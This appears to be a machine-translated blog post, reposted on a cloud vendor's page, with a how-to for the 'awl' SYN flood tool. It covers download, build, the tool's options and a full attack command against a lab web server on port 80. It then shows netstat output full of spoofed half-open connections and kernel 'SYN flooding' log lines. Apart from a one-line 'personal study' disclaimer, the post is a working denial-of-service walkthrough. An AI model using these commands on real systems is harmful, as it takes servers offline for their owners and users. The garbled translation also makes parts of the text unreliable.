The awl of the SYN Flood tool is simple to use!

Source: Internet
Author: User

Download the package:

Wget

[email protected] ~]# LL

Total dosage 292

-rw-r--r--1 root root 296340 September 8 10:28 awl-0.2.tar_vhcfaewruq7s.gz

[Email protected] ~]# Tar XF awl-0.2.tar_vhcfaewruq7s.gz

[Email protected] ~]# CD awl-0.2

[[Email protected] awl-0.2]#

[[email protected] awl-0.2]#./configure && make&& make install

[Email protected] ~]# AW

Awk Awl

[Email protected] ~]# AW

The parameters are as follows:

-I sends the interface of the package, if omitted the default is Eth0

-M is attacked the MAC address of the machine, the program can not get the Mac according to the attack IP, need to be manually specified. Ping the target IP first, then arp-a. FF:FF:FF:FF:FF:FF if omitted

-d The IP of the attacked machine

-P is the port of the attacking machine.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Attacker:


[[Email Protected]an ~]# awl-i eth0-m 00:0c:29:39:ce:a4-d 192.168.1.218-p 80

Attacked by:

TCP 0 0 192.168.1.218:80 6.5.128.103:29105 syn_recv-

TCP 0 0 192.168.1.218:80 123.146.105.97:11200 syn_recv-

TCP 0 0 192.168.1.218:80 162.103.151.22:13540 syn_recv-

TCP 0 0 192.168.1.218:80 114.6.226.115:4986 syn_recv-

TCP 0 0 192.168.1.218:80 8.38.204.32:9703 syn_recv-

TCP 0 0 192.168.1.218:80 79.198.242.55:43912 syn_recv-

TCP 0 0 192.168.1.218:80 26.145.249.31:35158 syn_recv-

TCP 0 0 192.168.1.218:80 192.2.151.95:17551 syn_recv-

TCP 0 0 192.168.1.218:80 116.246.148.67:45865 syn_recv-

TCP 0 0 192.168.1.218:80 91.119.159.10:960 syn_recv-

TCP 0 0 192.168.1.218:80 81.0.9.64:39621 syn_recv-

TCP 0 0 192.168.1.218:80 167.18.151.54:43510 syn_recv-

TCP 0 0 192.168.1.218:80 210.94.41.57:53857 syn_recv-

TCP 0 0 192.168.1.218:80 51.126.4.52:53039 syn_recv-

650) this.width=650; "Src=" Http://s3.51cto.com/wyfs02/M00/87/00/wKioL1fRAZPyAMfyAAGoe9urPOQ651.png-wh_500x0-wm_3 -wmp_4-s_1424415113.png "title=" 1.png "alt=" Wkiol1frazpyamfyaagoe9urpoq651.png-wh_50 "/>

[Email protected] ~]# tail-f/var/log/messages

Feb 09:31:15 node3 yum[1432]: installed:apr-util-1.3.9-3.el6_0.1.x86_64

Feb 09:31:15 node3 yum[1432]: installed:apr-util-ldap-1.3.9-3.el6_0.1.x86_64

Feb 09:31:15 node3 yum[1432]: installed:httpd-tools-2.2.15-54.el6.centos.x86_64

Feb 09:31:15 node3 yum[1432]: Installed:mailcap-2.1.31-2.el6.noarch

Feb 09:31:19 node3 yum[1432]: installed:httpd-2.2.15-54.el6.centos.x86_64

Feb 09:37:07 node3 kernel:possible SYN flooding on port 80. Sending cookies.

Feb 09:38:07 node3 kernel:possible SYN flooding on port 80. Sending cookies.

Feb 09:39:56 node3 yum[1515]: installed:wget-1.12-8.el6.x86_64

Feb 09:55:26 node3 kernel:possible SYN flooding on port 80. Sending cookies.

Feb 09:58:05 node3 kernel:possible SYN flooding on port 80. Sending cookies.


Disclaimer: Just for personal study, please do not malicious attack other people's servers.

This article from the "[email protected]" blog, declined to reprint!

The awl of the SYN Flood tool is simple to use!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.